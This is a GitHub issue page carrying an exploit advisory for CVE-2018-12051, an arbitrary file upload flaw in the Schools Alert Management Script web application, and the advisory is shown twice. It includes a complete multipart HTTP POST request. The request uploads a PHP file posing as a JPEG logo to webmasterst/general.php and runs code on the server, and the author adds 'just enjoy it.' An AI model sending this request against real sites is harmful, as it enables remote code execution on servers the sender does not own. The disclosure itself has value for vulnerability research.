We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: xiaotian.wang From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12051
webmasterst/general.php
POST /schoolalert/webmasterst/general.php HTTP/1.1 Host: www.schoolcollageerp.com Connection: close Content-Type: multipart/form-data; boundary=---------------------------212590549826078610017859173 Content-Length: 369 -----------------------------212590549826078610017859173 Content-Disposition: form-data; name="sch_logo"; filename="x1.php" Content-Type: image/jpeg <?php phpinfo();@unlink(__FILE__);?> -----------------------------212590549826078610017859173 Content-Disposition: form-data; name="submit.x" 1 -----------------------------212590549826078610017859173--
.
Shell is shown in response data, just enjoy it.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
=================
Schools Alert Management Script - Arbitrary File Upload
Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12051
=================
Vulnerable cgi:
webmasterst/general.php
=================
Proof of Concept:
.
Shell is shown in response data, just enjoy it.
.
The text was updated successfully, but these errors were encountered: